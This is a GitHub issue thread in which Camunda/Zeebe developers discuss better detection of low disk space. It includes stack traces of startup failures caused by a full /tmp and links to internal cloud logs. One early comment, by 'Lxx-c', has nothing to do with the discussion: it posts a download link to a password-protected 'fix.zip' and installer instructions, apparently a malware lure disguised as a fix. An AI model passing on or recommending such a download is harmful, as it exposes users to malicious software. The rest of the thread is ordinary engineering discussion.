### ISSUE TITLE
Better detection of available disk space

### ISSUE THREAD

**Issue by Zelldon** [camunda/camunda#21574]
**Description**

We have several ERROR logs in our error reporting tooling, which can be root-caused to not enough disk space. As they in general are often harder to understand or track down as a dedicated message that the broker is out of disk space, I would prefer later.

For example see the following:

```

java.lang.ExceptionInInitializerError: null
	at io.camunda.zeebe.broker.partitioning.startup.ZeebePartitionFactory.createStateController(ZeebePartitionFactory.java:190) ~[zeebe-broker-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.broker.partitioning.startup.ZeebePartitionFactory.constructPartition(ZeebePartitionFactory.java:140) ~[zeebe-broker-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.broker.partitioning.startup.steps.ZeebePartitionStep.startup(ZeebePartitionStep.java:28) ~[zeebe-broker-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.broker.partitioning.startup.steps.ZeebePartitionStep.startup(ZeebePartitionStep.java:14) ~[zeebe-broker-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.startup.StartupProcess.proceedWithStartupSynchronized(StartupProcess.java:162) ~[zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.startup.StartupProcess.lambda$proceedWithStartupSynchronized$3(StartupProcess.java:170) ~[zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.future.FutureContinuationRunnable.run(FutureContinuationRunnable.java:28) ~[zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorJob.invoke(ActorJob.java:96) ~[zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorJob.execute(ActorJob.java:47) [zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorTask.execute(ActorTask.java:122) [zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorThread.executeCurrentTask(ActorThread.java:130) [zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorThread.doWork(ActorThread.java:108) [zeebe-scheduler-8.5.3.jar:8.5.3]
	at io.camunda.zeebe.scheduler.ActorThread.run(ActorThread.java:227) [zeebe-scheduler-8.5.3.jar:8.5.3]
Caused by: java.lang.RuntimeException: Unable to load the RocksDB shared library
	at org.rocksdb.RocksDB.loadLibrary(RocksDB.java:76) ~[rocksdbjni-8.11.4.jar:?]
	at io.camunda.zeebe.db.impl.rocksdb.ZeebeRocksDbFactory.<clinit>(ZeebeRocksDbFactory.java:49) ~[zeebe-db-8.5.3.jar:8.5.3]
	... 13 more
Caused by: java.io.IOException: No space left on device
	at java.base/sun.nio.ch.UnixFileDispatcherImpl.write0(Native Method) ~[?:?]
	at java.base/sun.nio.ch.UnixFileDispatcherImpl.write(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.IOUtil.writeFromNativeBuffer(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.IOUtil.write(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.IOUtil.write(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.FileChannelImpl.write(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.ChannelOutputStream.writeFully(Unknown Source) ~[?:?]
	at java.base/sun.nio.ch.ChannelOutputStream.write(Unknown Source) ~[?:?]
	at java.base/java.io.InputStream.transferTo(Unknown Source) ~[?:?]
	at java.base/java.nio.file.Files.copy(Unknown Source) ~[?:?]
	at org.rocksdb.NativeLibraryLoader.loadLibraryFromJarToTemp(NativeLibraryLoader.java:145) ~[rocksdbjni-8.11.4.jar:?]
	at org.rocksdb.NativeLibraryLoader.loadLibraryFromJar(NativeLibraryLoader.java:107) ~[rocksdbjni-8.11.4.jar:?]
	at org.rocksdb.NativeLibraryLoader.loadLibrary(NativeLibraryLoader.java:87) ~[rocksdbjni-8.11.4.jar:?]
	at org.rocksdb.RocksDB.loadLibrary(RocksDB.java:73) ~[rocksdbjni-8.11.4.jar:?]
	at io.camunda.zeebe.db.impl.rocksdb.ZeebeRocksDbFactory.<clinit>(ZeebeRocksDbFactory.java:49) ~[zeebe-db-8.5.3.jar:8.5.3]
	... 13 more
```

The error group https://console.cloud.google.com/errors/detail/CLiJv4igkcuLMg;service=zeebe;time=P30D;locations=global?project=camunda-cloud-240911 reports with `ExceptionInInitializerError: null` here it is unclear what could be the reason. To reduce unnecessary debug and investigation I think we can do better.

Potential solution:

Prevent further starting of system if disk space is expected to be reached soon.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by npepinpe** [comment]
What would be the outcome if we did detect it? 🤔 Do we just ignore out of disk space related issues at the moment?

**Comment by Zelldon** [comment]
> Potential solution:
>
> Prevent further starting of system if disk space is expected to be reached soon.

**Comment by npepinpe** [comment]
I meant in the observability part.

> To reduce unnecessary debug and investigation I think we can do better.

We would still see an error, right? So it's still noise in terms of error reports.

**Comment by lenaschoenburg** [comment]
> Prevent further starting of system if disk space is expected to be reached soon.

Note that this specific failure of loading rocksdb is caused by missing space in `/tmp` which is not always disk space and doesn't mean that there wouldn't be enough space in the data disk.

**Comment by npepinpe** [comment]
Good point, /tmp can be mounted in memory so it would be more an out of memory error 😄

**Comment by Zelldon** [comment]
Ah. My expectation would be that we have a clear message and context. 

Like: `Expected to bootstrap service X, but failed to due to reaching disk limits (available disk space XY)`  If it is happening on startup we can prevent further starting and have such message, instead of hundreds of different error logs we have to investigate.

**Comment by rodrigo-lourenco-lopes** [comment]
We got a similar case [here](https://console.cloud.google.com/logs/query;query=logName:%22stdout%22%0Aresource.type%3D%22k8s_container%22%0Aresource.labels.namespace_name%3D%22616116fa-575b-4a2b-90c7-dcc9a8ab25d9-zeebe%22%0Aresource.labels.project_id%3D%22camunda-saas-dev%22%0Aresource.labels.location%3D%22europe-north1%22%0Aresource.labels.pod_name%3D%22zeebe-0%22%0Aresource.labels.cluster_name%3D%22worker-2%22%0Aresource.labels.container_name%3D%22zeebe%22;pinnedLogId=2025-07-18T08:30:28.821560637Z%2F60xq162jvm9tnbtj;cursorTimestamp=2025-07-18T08:30:28.913517571Z;startTime=2025-07-18T08:00:58.821Z;endTime=2025-07-18T09:00:58.821Z?inv=1&invt=Ab3hhA&project=camunda-saas-dev) where we fail to allocate space in /tmp.

```
org.springframework.context.ApplicationContextException: Unable to start web server
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:170) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:621) ~[spring-context-6.2.6.jar:6.2.6]
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:146) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:753) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:439) [spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.SpringApplication.run(SpringApplication.java:318) [spring-boot-3.4.5.jar:3.4.5]
	at io.camunda.application.StandaloneCamunda.main(StandaloneCamunda.java:66) [camunda-zeebe-8.8.0-alpha5.jar:8.8.0-alpha5]
Caused by: org.springframework.boot.web.server.WebServerException: Unable to create tempDir. java.io.tmpdir is set to /tmp
	at org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir(AbstractConfigurableWebServerFactory.java:221) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getWebServer(TomcatServletWebServerFactory.java:201) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.createWebServer(ServletWebServerApplicationContext.java:193) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:167) ~[spring-boot-3.4.5.jar:3.4.5]
	... 6 more
Caused by: java.nio.file.FileSystemException: /tmp/tomcat.8080.11450579213823348126: No space left on device
	at java.base/sun.nio.fs.UnixException.translateToIOException(Unknown Source) ~[?:?]
	at java.base/sun.nio.fs.UnixException.rethrowAsIOException(Unknown Source) ~[?:?]
	at java.base/sun.nio.fs.UnixException.rethrowAsIOException(Unknown Source) ~[?:?]
	at java.base/sun.nio.fs.UnixFileSystemProvider.createDirectory(Unknown Source) ~[?:?]
	at java.base/java.nio.file.Files.createDirectory(Unknown Source) ~[?:?]
	at java.base/java.nio.file.TempFileHelper.create(Unknown Source) ~[?:?]
	at java.base/java.nio.file.TempFileHelper.createTempDirectory(Unknown Source) ~[?:?]
	at java.base/java.nio.file.Files.createTempDirectory(Unknown Source) ~[?:?]
	at org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir(AbstractConfigurableWebServerFactory.java:215) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getWebServer(TomcatServletWebServerFactory.java:201) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.createWebServer(ServletWebServerApplicationContext.java:193) ~[spring-boot-3.4.5.jar:3.4.5]
	at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:167) ~[spring-boot-3.4.5.jar:3.4.5]
	... 6 more
```

**Comment by rodrigo-lourenco-lopes** [comment]
Also seen [here](https://console.cloud.google.com/errors/detail/CIGo3dOK2oTC2QE;service=zeebe;time=P7D;locations=global?project=camunda-saas-int-chaos) where we are unable to start the web server.

**Comment by koevskinikola** [comment]
Got another case here:
- Env: SaaS Dev
- Version: `8.9.0-SNAPSHOT`
- GCP log viewer: [internal link](https://console.cloud.google.com/logs/query;query=logName:%22stdout%22%0Aresource.type%3D%22k8s_container%22%0Aresource.labels.namespace_name%3D%228566c488-d1dd-4ab9-b9c3-cc56ac990b69-zeebe%22%0Aresource.labels.cluster_name%3D%22worker-2%22%0Aresource.labels.project_id%3D%22camunda-saas-dev%22%0Aresource.labels.container_name%3D%22zeebe%22%0Aresource.labels.location%3D%22europe-north1%22%0Aresource.labels.pod_name%3D%22zeebe-2%22;pinnedLogId=2025-10-31T22:47:08.228286323Z%2Flchsbowijwtbe3tw;cursorTimestamp=2025-10-31T22:47:08.228286323Z;startTime=2025-10-31T22:17:38.228Z;endTime=2025-10-31T23:17:38.228Z?project=camunda-saas-dev)
- GCO downloaded logs: [internal link](https://drive.google.com/file/d/1joowJgcrRXd79BPh5qiJGTNoJNOvkMZn/view?usp=sharing)

**Comment by berkaycanbc** [comment]
Ocurred again on `SaaS INT Chaos` with version `8.8-SNAPSHOT`: [Error Link](https://console.cloud.google.com/errors/detail/CKS-yJD20JT-rgE;service=zeebe;time=P7D;locations=global?project=camunda-saas-int-chaos)

**Comment by koevskinikola** [comment]
Occured again here:
- Env: SaaS Prod
- Version: 8.8.11
- GCP log viewer: [internal link](https://console.cloud.google.com/logs/query;query=logName:%22stdout%22%0Aresource.type%3D%22k8s_container%22%0Aresource.labels.project_id%3D%22camunda-cloud-240911%22%0Aresource.labels.location%3D%22europe-west1%22%0Aresource.labels.container_name%3D%22zeebe%22%0Aresource.labels.cluster_name%3D%22production-worker-1%22%0Aresource.labels.namespace_name%3D%22bd9a51f7-d13b-4138-b03b-708e13ee8124-zeebe%22%0Aresource.labels.pod_name%3D%22zeebe-1%22;pinnedLogId=2026-04-09T22:27:49.135767224Z%2Fgzn6756cjrz4em29;cursorTimestamp=2026-04-09T22:28:00.678189953Z;startTime=2026-04-09T21:58:19.135Z;endTime=2026-04-09T22:58:19.135Z?project=camunda-cloud-240911)
- GCP downloaded logs: [internal link](https://drive.google.com/file/d/1m9HD0WgaVBvvFVuO2gpgAr5Qk7GTxgVu/view?usp=sharing)
